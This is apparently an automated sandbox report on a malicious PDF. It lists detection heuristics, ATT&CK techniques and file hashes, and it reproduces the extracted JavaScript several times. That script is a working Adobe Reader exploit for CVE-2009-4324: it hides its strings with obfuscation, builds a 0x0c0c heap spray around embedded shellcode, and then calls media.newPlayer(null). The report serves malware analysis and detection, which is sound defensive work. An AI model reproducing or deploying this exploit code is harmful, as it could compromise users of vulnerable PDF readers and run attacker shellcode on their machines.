MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains obfuscated JavaScript that leverages the media.newPlayer object to trigger CVE-2009-4324. This vulnerability is used to perform a heap spray, a common technique for delivering further malicious content. The ML classifier strongly indicates maliciousness, and the specific CVE points to a known exploit pattern.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 7
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/iX/1.0/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0018_000.js |
pdf-javascript-stream | PDF /JS object 18 at offset 0x4B0 | 2947 bytes |
SHA-256: 802d40bc022c9e462c4b6c4432ee9c4d28469f8ca77e9516d397edce0c7ab07f |
|||
Preview scriptFirst 1,000 lines of the extracted script
var myun=unescape;
var sc1="%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090\x25\x759090\x25\x759090\x25\x759090\x25\x759090";
var sc2 ="%uYG18EB%uYG575F%uYG335E%uYGB9DB%uYG016B%uYG0000%uYGC0AC%uYG06C8%uYGFE34%uYG43AA%uYGD93B%uYG0774%uYGF2EB%uYGE3E8%uYGFFFF%uYGEAFF%uYG845D%uYG8E5F%uYGA78C%uYG0B73%uYGB313%uYG5DA6%uYG5D3F%uYGBCAF%uYGA35D%uYGD4B8%uYGAF5D%uYGDDBD%uYG80EE%uYG8F5F%uYG5DB0%uYG7FBF%uYG80EE%uYG8F5F%uYG5DA1%uYG7FBF%uYG80EE%uYGA35D%uYG7FB7%uYG80E2%uYG0FC5%uYGBFBF%uYG5CBF%uYG88EE%uYGEE4E%uYGBF81%uYGBFBF%uYG5DBF%uYG88E0%uYG4580%uYG2AB5%uYGAB6A%uYG40D1%uYG4040%uYG3340%uYG038F%uYG4214%uYGDDCB%uYG82EC%uYG68A9%uYG4E85%uYGBFBF%uYGDCBF%uYG8BE2%uYGE27F%uYGDD81%uYG283A%uYGE07F%uYG5F82%uYG81EE%uYG9FBE%uYGBF70%uYG4BE2%uYGBE25%uYGBFA5%uYGBFBB%uYGA5BF%uYGBFBF%uYGBFBB%uYGBF25%uYGEA40%uYGDD89%uYG84EE%uYGEE4E%uYGBF83%uYGBFBF%uYG5FBF%uYG83EE%uYG25BE%uYG25BF%uYG25BF%uYG40BF%uYG83E2%uYGEA40%uYG7D8A%uYGE28F%uYG25AE%uYG25BF%uYGDCBF%uYG8CE0%uYGA56A%uYGBFBF%uYGBFBB%uYGE240%uYG4084%uYG83E2%uYGEA40%uYG7D8B%uYGA28F%uYG5D36%uYG84E2%uYG30DF%uYGABF6%uYG2EAE%uYG4EE2%uYGBFD1%uYGBF72%uYGEFBF%uYGEE5D%uYG5F8C%uYGBD85%uYG8D71%uYG5260%uYGB0DF%uYG43F3%uYG00C0%uYGE242%uYG4584%uYG453E%uYG4515%uYG453F%uYG5F16%uYGBECF%uYGEA5D%uYG5D84%uYG83E8%uYGBE5D%uYG7FFB%uYG400F%uYG8587%uYG40F1%uYG4040%uYGE62B%uYGA6E7%uYGE52E%uYGE6A4%uYG6BBF%uYGA2E6%uYGE52E%uYGE6A4%uYG64AB%uYG24E5%uYGE6A2%uYGBF23%uYGE52A%uYGA223%uYGE7E2%uYGEFA4%uYGA4A4%uYG6764%uYGBFBF%uYG6F45%uYGAB5D%uYG6AB9%uYG2BEB%uYG5D2A%uYG7F32%uYG80E2%uYG4380%uYG2816%uYGE929%uYGA268%uYG5F3E%uYGBE0E%uYGE22D%uYG5D85%uYGB9AD%uYG0D75%uYGC7CB%uYGAB5D%uYG7FB6%uYG80EA%uYGCB7F%uYGCD73%uYG5D26%uYGCB3D%uYGCBC7%uYG5DC7%uYGB8AB%uYGEA7F%uYG7F80%uYG5DCB%uYG7F3B%uYG80EA%uYG4069%uYGE747%uYG4FCD%uYG6260%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462";
var sc3=sc1+sc2;
var mysc=myun(sc3.replace(/YG/g,""));
var str1="YG\x25YG\x750YG\x630YG\x63YG\x25YG\x750YG\x630YG\x63";
var mystr1 = myun(str1.replace(/YG/g,""));
var str2="YG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574";
var mystr2 = myun(str2.replace(/YG/g,""));
while(mystr1.length <= 32768) mystr1+=mystr1;
var str3="YG\x73YG\x75YG\x62YG\x73YG\x74YG\x72YG\x69YG\x6eYG\x67";
var mystr3=str3.replace(/YG/g,"");
mystr1=mystr1[mystr3](0,32768 - mysc.length);
memory=new Array();
for(i=0;i<0x2000;i++){
memory[i]= mystr1 + mysc;
}
util.printd("aaa", new Date());
util.printd("bbb", new Date());
var str4="YG\x6eYG\x65YG\x77YG\x50YG\x6cYG\x61YG\x79YG\x65YG\x72";
var mystr4=str4.replace(/YG/g,"");
try {this.media[mystr4](null);} catch(e) {}
util.printd(mystr2, new Date());
|
|||
javascript_obj0018_000_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 18 at offset 0x4B0 | 432 bytes |
SHA-256: 4970165b710bae678b3d9a3a4feade47c8a8d62ff6431699852cfcd23bf144a4 |
|||
javascript_obj0018_000_shellcode_01.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 18 at offset 0x4B0 | 72 bytes |
SHA-256: 3d968853b2aeb9b6edf437ce057e919ad269a51a0e74271acccc54b0f1ca7f95 |
|||
javascript_obj0022_001.js |
pdf-javascript-stream | PDF /JS object 22 at offset 0x23FE | 2948 bytes |
SHA-256: 10d5cd867eeafc0d5ad2fdc29032ffbb860e3074da98b836c78f63661576c5ed |
|||
Preview scriptFirst 1,000 lines of the extracted script
var myun=unescape;
var sc1="%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090\x25\x759090\x25\x759090\x25\x759090\x25\x759090";
var sc2 ="%uYG18EB%uYG575F%uYG335E%uYGB9DB%uYG016B%uYG0000%uYGC0AC%uYG06C8%uYGFE34%uYG43AA%uYGD93B%uYG0774%uYGF2EB%uYGE3E8%uYGFFFF%uYGEAFF%uYG845D%uYG8E5F%uYGA78C%uYG0B73%uYGB313%uYG5DA6%uYG5D3F%uYGBCAF%uYGA35D%uYGD4B8%uYGAF5D%uYGDDBD%uYG80EE%uYG8F5F%uYG5DB0%uYG7FBF%uYG80EE%uYG8F5F%uYG5DA1%uYG7FBF%uYG80EE%uYGA35D%uYG7FB7%uYG80E2%uYG0FC5%uYGBFBF%uYG5CBF%uYG88EE%uYGEE4E%uYGBF81%uYGBFBF%uYG5DBF%uYG88E0%uYG4580%uYG2AB5%uYGAB6A%uYG40D1%uYG4040%uYG3340%uYG038F%uYG4214%uYGDDCB%uYG82EC%uYG68A9%uYG4E85%uYGBFBF%uYGDCBF%uYG8BE2%uYGE27F%uYGDD81%uYG283A%uYGE07F%uYG5F82%uYG81EE%uYG9FBE%uYGBF70%uYG4BE2%uYGBE25%uYGBFA5%uYGBFBB%uYGA5BF%uYGBFBF%uYGBFBB%uYGBF25%uYGEA40%uYGDD89%uYG84EE%uYGEE4E%uYGBF83%uYGBFBF%uYG5FBF%uYG83EE%uYG25BE%uYG25BF%uYG25BF%uYG40BF%uYG83E2%uYGEA40%uYG7D8A%uYGE28F%uYG25AE%uYG25BF%uYGDCBF%uYG8CE0%uYGA56A%uYGBFBF%uYGBFBB%uYGE240%uYG4084%uYG83E2%uYGEA40%uYG7D8B%uYGA28F%uYG5D36%uYG84E2%uYG30DF%uYGABF6%uYG2EAE%uYG4EE2%uYGBFD1%uYGBF72%uYGEFBF%uYGEE5D%uYG5F8C%uYGBD85%uYG8D71%uYG5260%uYGB0DF%uYG43F3%uYG00C0%uYGE242%uYG4584%uYG453E%uYG4515%uYG453F%uYG5F16%uYGBECF%uYGEA5D%uYG5D84%uYG83E8%uYGBE5D%uYG7FFB%uYG400F%uYG8587%uYG40F1%uYG4040%uYGE62B%uYGA6E7%uYGE52E%uYGE6A4%uYG6BBF%uYGA2E6%uYGE52E%uYGE6A4%uYG64AB%uYG24E5%uYGE6A2%uYGBF23%uYGE52A%uYGA223%uYGE7E2%uYGEFA4%uYGA4A4%uYG6764%uYGBFBF%uYG6F45%uYGAB5D%uYG6AB9%uYG2BEB%uYG5D2A%uYG7F32%uYG80E2%uYG4380%uYG2816%uYGE929%uYGA268%uYG5F3E%uYGBE0E%uYGE22D%uYG5D85%uYGB9AD%uYG0D75%uYGC7CB%uYGAB5D%uYG7FB6%uYG80EA%uYGCB7F%uYGCD73%uYG5D26%uYGCB3D%uYGCBC7%uYG5DC7%uYGB8AB%uYGEA7F%uYG7F80%uYG5DCB%uYG7F3B%uYG80EA%uYG4069%uYGE747%uYG4FCD%uYG6260%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462";
var sc3=sc1+sc2;
var mysc=myun(sc3.replace(/YG/g,""));
var str1="YG\x25YG\x750YG\x630YG\x63YG\x25YG\x750YG\x630YG\x63";
var mystr1 = myun(str1.replace(/YG/g,""));
var str2="YG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0cYG\x25YG\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574";
var mystr2 = myun(str2.replace(/YG/g,""));
while(mystr1.length <= 32768) mystr1+=mystr1;
var str3="YG\x73YG\x75YG\x62YG\x73YG\x74YG\x72YG\x69YG\x6eYG\x67";
var mystr3=str3.replace(/YG/g,"");
mystr1=mystr1[mystr3](0,32768 - mysc.length);
memory=new Array();
for(i=0;i<0x2000;i++){
memory[i]= mystr1 + mysc;
}
util.printd("aaa", new Date());
util.printd("bbb", new Date());
var str4="YG\x6eYG\x65YG\x77YG\x50YG\x6cYG\x61YG\x79YG\x65YG\x72";
var mystr4=str4.replace(/YG/g,"");
try {this.media[mystr4](null);} catch(e) {}
util.printd(mystr2, new Date());
|
|||
js_property_alias_stage_000.js |
deobfuscated-js | JavaScript property alias normalized stage at offset 0x4B0 | 2875 bytes |
SHA-256: 1dba00a8990cd6adab705c22574699b5212ee164554ba577e503cadf1f6c5537 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var myun=unescape;
var sc1="%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%u9090%u9090%u9090%u9090";
var sc2 ="%uYG18EB%uYG575F%uYG335E%uYGB9DB%uYG016B%uYG0000%uYGC0AC%uYG06C8%uYGFE34%uYG43AA%uYGD93B%uYG0774%uYGF2EB%uYGE3E8%uYGFFFF%uYGEAFF%uYG845D%uYG8E5F%uYGA78C%uYG0B73%uYGB313%uYG5DA6%uYG5D3F%uYGBCAF%uYGA35D%uYGD4B8%uYGAF5D%uYGDDBD%uYG80EE%uYG8F5F%uYG5DB0%uYG7FBF%uYG80EE%uYG8F5F%uYG5DA1%uYG7FBF%uYG80EE%uYGA35D%uYG7FB7%uYG80E2%uYG0FC5%uYGBFBF%uYG5CBF%uYG88EE%uYGEE4E%uYGBF81%uYGBFBF%uYG5DBF%uYG88E0%uYG4580%uYG2AB5%uYGAB6A%uYG40D1%uYG4040%uYG3340%uYG038F%uYG4214%uYGDDCB%uYG82EC%uYG68A9%uYG4E85%uYGBFBF%uYGDCBF%uYG8BE2%uYGE27F%uYGDD81%uYG283A%uYGE07F%uYG5F82%uYG81EE%uYG9FBE%uYGBF70%uYG4BE2%uYGBE25%uYGBFA5%uYGBFBB%uYGA5BF%uYGBFBF%uYGBFBB%uYGBF25%uYGEA40%uYGDD89%uYG84EE%uYGEE4E%uYGBF83%uYGBFBF%uYG5FBF%uYG83EE%uYG25BE%uYG25BF%uYG25BF%uYG40BF%uYG83E2%uYGEA40%uYG7D8A%uYGE28F%uYG25AE%uYG25BF%uYGDCBF%uYG8CE0%uYGA56A%uYGBFBF%uYGBFBB%uYGE240%uYG4084%uYG83E2%uYGEA40%uYG7D8B%uYGA28F%uYG5D36%uYG84E2%uYG30DF%uYGABF6%uYG2EAE%uYG4EE2%uYGBFD1%uYGBF72%uYGEFBF%uYGEE5D%uYG5F8C%uYGBD85%uYG8D71%uYG5260%uYGB0DF%uYG43F3%uYG00C0%uYGE242%uYG4584%uYG453E%uYG4515%uYG453F%uYG5F16%uYGBECF%uYGEA5D%uYG5D84%uYG83E8%uYGBE5D%uYG7FFB%uYG400F%uYG8587%uYG40F1%uYG4040%uYGE62B%uYGA6E7%uYGE52E%uYGE6A4%uYG6BBF%uYGA2E6%uYGE52E%uYGE6A4%uYG64AB%uYG24E5%uYGE6A2%uYGBF23%uYGE52A%uYGA223%uYGE7E2%uYGEFA4%uYGA4A4%uYG6764%uYGBFBF%uYG6F45%uYGAB5D%uYG6AB9%uYG2BEB%uYG5D2A%uYG7F32%uYG80E2%uYG4380%uYG2816%uYGE929%uYGA268%uYG5F3E%uYGBE0E%uYGE22D%uYG5D85%uYGB9AD%uYG0D75%uYGC7CB%uYGAB5D%uYG7FB6%uYG80EA%uYGCB7F%uYGCD73%uYG5D26%uYGCB3D%uYGCBC7%uYG5DC7%uYGB8AB%uYGEA7F%uYG7F80%uYG5DCB%uYG7F3B%uYG80EA%uYG4069%uYGE747%uYG4FCD%uYG6260%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462";
var sc3=sc1+sc2;
var mysc=myun(sc3.replace(/YG/g,""));
var str1="YG%YGu0YGc0YGcYG%YGu0YGc0YGc";
var mystr1 = myun(str1.replace(/YG/g,""));
var str2="YG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574";
var mystr2 = myun(str2.replace(/YG/g,""));
while(mystr1.length <= 32768) mystr1+=mystr1;
var str3="YGsYGuYGbYGsYGtYGrYGiYGnYGg";
var mystr3=str3.replace(/YG/g,"");
mystr1=mystr1[mystr3](0,32768 - mysc.length);
memory=new Array();
for(i=0;i<0x2000;i++){
memory[i]= mystr1 + mysc;
}
util.printd("aaa", new Date());
util.printd("bbb", new Date());
var str4="YGnYGeYGwYGPYGlYGaYGyYGeYGr";
var mystr4=str4.replace(/YG/g,"");
try {this.media.newPlayer(null);} catch(e) {}
util.printd(mystr2, new Date());
/* static-property-alias-sinks */
unescape('%u9090%u9090');media.newPlayer(
|
|||
js_property_alias_stage_001.js |
deobfuscated-js | JavaScript property alias normalized stage at offset 0x23FE | 2876 bytes |
SHA-256: 9d881dc6eb8ad1efa497688b93897808804c31322d848ae92f0643531045f70c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var myun=unescape;
var sc1="%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%uYG9090%u9090%u9090%u9090%u9090";
var sc2 ="%uYG18EB%uYG575F%uYG335E%uYGB9DB%uYG016B%uYG0000%uYGC0AC%uYG06C8%uYGFE34%uYG43AA%uYGD93B%uYG0774%uYGF2EB%uYGE3E8%uYGFFFF%uYGEAFF%uYG845D%uYG8E5F%uYGA78C%uYG0B73%uYGB313%uYG5DA6%uYG5D3F%uYGBCAF%uYGA35D%uYGD4B8%uYGAF5D%uYGDDBD%uYG80EE%uYG8F5F%uYG5DB0%uYG7FBF%uYG80EE%uYG8F5F%uYG5DA1%uYG7FBF%uYG80EE%uYGA35D%uYG7FB7%uYG80E2%uYG0FC5%uYGBFBF%uYG5CBF%uYG88EE%uYGEE4E%uYGBF81%uYGBFBF%uYG5DBF%uYG88E0%uYG4580%uYG2AB5%uYGAB6A%uYG40D1%uYG4040%uYG3340%uYG038F%uYG4214%uYGDDCB%uYG82EC%uYG68A9%uYG4E85%uYGBFBF%uYGDCBF%uYG8BE2%uYGE27F%uYGDD81%uYG283A%uYGE07F%uYG5F82%uYG81EE%uYG9FBE%uYGBF70%uYG4BE2%uYGBE25%uYGBFA5%uYGBFBB%uYGA5BF%uYGBFBF%uYGBFBB%uYGBF25%uYGEA40%uYGDD89%uYG84EE%uYGEE4E%uYGBF83%uYGBFBF%uYG5FBF%uYG83EE%uYG25BE%uYG25BF%uYG25BF%uYG40BF%uYG83E2%uYGEA40%uYG7D8A%uYGE28F%uYG25AE%uYG25BF%uYGDCBF%uYG8CE0%uYGA56A%uYGBFBF%uYGBFBB%uYGE240%uYG4084%uYG83E2%uYGEA40%uYG7D8B%uYGA28F%uYG5D36%uYG84E2%uYG30DF%uYGABF6%uYG2EAE%uYG4EE2%uYGBFD1%uYGBF72%uYGEFBF%uYGEE5D%uYG5F8C%uYGBD85%uYG8D71%uYG5260%uYGB0DF%uYG43F3%uYG00C0%uYGE242%uYG4584%uYG453E%uYG4515%uYG453F%uYG5F16%uYGBECF%uYGEA5D%uYG5D84%uYG83E8%uYGBE5D%uYG7FFB%uYG400F%uYG8587%uYG40F1%uYG4040%uYGE62B%uYGA6E7%uYGE52E%uYGE6A4%uYG6BBF%uYGA2E6%uYGE52E%uYGE6A4%uYG64AB%uYG24E5%uYGE6A2%uYGBF23%uYGE52A%uYGA223%uYGE7E2%uYGEFA4%uYGA4A4%uYG6764%uYGBFBF%uYG6F45%uYGAB5D%uYG6AB9%uYG2BEB%uYG5D2A%uYG7F32%uYG80E2%uYG4380%uYG2816%uYGE929%uYGA268%uYG5F3E%uYGBE0E%uYGE22D%uYG5D85%uYGB9AD%uYG0D75%uYGC7CB%uYGAB5D%uYG7FB6%uYG80EA%uYGCB7F%uYGCD73%uYG5D26%uYGCB3D%uYGCBC7%uYG5DC7%uYGB8AB%uYGEA7F%uYG7F80%uYG5DCB%uYG7F3B%uYG80EA%uYG4069%uYGE747%uYG4FCD%uYG6260%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462%uYG6866%uYG6C6A%uYG626E%uYG6664%uYG6A68%uYG6E6C%uYG6462";
var sc3=sc1+sc2;
var mysc=myun(sc3.replace(/YG/g,""));
var str1="YG%YGu0YGc0YGcYG%YGu0YGc0YGc";
var mystr1 = myun(str1.replace(/YG/g,""));
var str2="YG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0cYG%YGu0c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574";
var mystr2 = myun(str2.replace(/YG/g,""));
while(mystr1.length <= 32768) mystr1+=mystr1;
var str3="YGsYGuYGbYGsYGtYGrYGiYGnYGg";
var mystr3=str3.replace(/YG/g,"");
mystr1=mystr1[mystr3](0,32768 - mysc.length);
memory=new Array();
for(i=0;i<0x2000;i++){
memory[i]= mystr1 + mysc;
}
util.printd("aaa", new Date());
util.printd("bbb", new Date());
var str4="YGnYGeYGwYGPYGlYGaYGyYGeYGr";
var mystr4=str4.replace(/YG/g,"");
try {this.media.newPlayer(null);} catch(e) {}
util.printd(mystr2, new Date());
/* static-property-alias-sinks */
unescape('%u9090%u9090');media.newPlayer(
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.